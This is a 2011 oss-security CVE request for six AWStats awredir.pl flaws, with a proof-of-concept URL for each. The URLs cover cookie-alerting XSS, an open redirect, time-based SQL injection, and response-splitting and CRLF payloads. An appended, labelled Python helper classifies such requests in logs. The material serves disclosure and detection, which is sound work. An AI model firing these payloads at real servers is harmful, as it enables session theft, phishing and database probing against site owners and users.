Date: Fri, 07 Oct 2011 10:17:15 +0200
From: Jan Lieskovsky <jlieskov@...hat.com>
To: "Steven M. Christey" <coley@...us.mitre.org>
CC: oss-security@...ts.openwall.com, MustLive <mustlive@...security.com.ua>
Subject: CVE Request -- Multiple security issues in various versions of AWStats

Hello Josh, Steve, vendors,

   it doesn't look like CVE ids have already been assigned for:
   [1] https://bugzilla.redhat.com/show_bug.cgi?id=740926#c0
   [2] http://secunia.com/advisories/46160/
   [3] http://seclists.org/fulldisclosure/2011/Sep/234
   [4] http://websecurity.com.ua/5380/

If I counted correctly, six CVE ids should be assigned for these
(since different versions are listed as vulnerable):

1) XSS (WASC-08) (in versions <=1.1):
    http://site/awredir.pl?url=javascript:alert(document.cookie)

2) Redirector (URL Redirector Abuse in WASC 2.0) (WASC-38):
    http://site/awredir.pl?url=http://websecurity.com.ua

3) SQL Injection (WASC-19): (version 1.2)
    http://site/awredir.pl?url='%20and%20benchmark(10000,md5(now()))/*

4) XSS (WASC-08) (in version 1.2):

    http://site/awredir.pl?url=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    http://site/awredir.pl?key=%3Cscript%3Ealert(document.cookie)%3C/script%3E

5) HTTP Response Splitting (WASC-25):

    http://site/awredir.pl?key=04ed5362e853c72ca275818a7c0c5857&url=%0AHeader:1

6) CRLF Injection (Improper Input Handling in WASC 2.0) (WASC-20):

    http://site/awredir.pl?key=4b9faa91e2529400c4f3c70833b4e4a5&url=%0AText

Could you allocate CVE identifiers for these? (let me know
if further description of each of the issues is necessary prior
to assignment).

Thank you && Regards, Jan.
--
Jan iankko Lieskovsky / Red Hat Security Response Team
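
Added example, not part of the original message and not AWStats code: a log-review helper that sorts requests to awredir.pl into the input classes listed in the message, using the `url` and `key` parameter names shown there. The function name, the finding labels and the `allowed_hosts` allowlist are assumptions made for this sketch; a finding marks the shape of the input, not whether a given AWStats version is affected.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Leading "scheme:" of a URL value; matched by hand so the result does not
# depend on how a given Python version's urlsplit() treats odd input.
SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")

def classify_awredir(request_uri, allowed_hosts=frozenset()):
    """Return sorted finding labels for the `url`/`key` parameters of one request."""
    query = request_uri.partition("?")[2]
    params = parse_qs(query, keep_blank_values=True)  # also percent-decodes
    findings = set()
    for name in ("url", "key"):
        for value in params.get(name, []):
            if "\r" in value or "\n" in value:
                findings.add("crlf")              # items 5 and 6
            if "<" in value or ">" in value:
                findings.add("markup")            # item 4
    for value in params.get("url", []):
        if "'" in value or '"' in value:
            findings.add("quote")                 # item 3
        match = SCHEME_RE.match(value)
        scheme = match.group(1).lower() if match else ""
        if scheme and scheme not in ("http", "https"):
            findings.add("non-http-scheme")       # item 1
        elif scheme:
            host = (urlsplit(value).hostname or "").lower()
            if host not in allowed_hosts:
                findings.add("offsite-redirect")  # item 2
    return sorted(findings)

# Constructed sample requests, reusing the query strings quoted in the message,
# plus one benign redirect to an allowlisted host.
SAMPLE_REQUESTS = [
    "/awredir.pl?url=javascript:alert(document.cookie)",
    "/awredir.pl?url=http://websecurity.com.ua",
    "/awredir.pl?url='%20and%20benchmark(10000,md5(now()))/*",
    "/awredir.pl?key=%3Cscript%3Ealert(document.cookie)%3C/script%3E",
    "/awredir.pl?key=04ed5362e853c72ca275818a7c0c5857&url=%0AHeader:1",
    "/awredir.pl?url=http://example.org/page",
]

if __name__ == "__main__":
    for uri in SAMPLE_REQUESTS:
        print(classify_awredir(uri, allowed_hosts={"example.org"}), uri)
```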
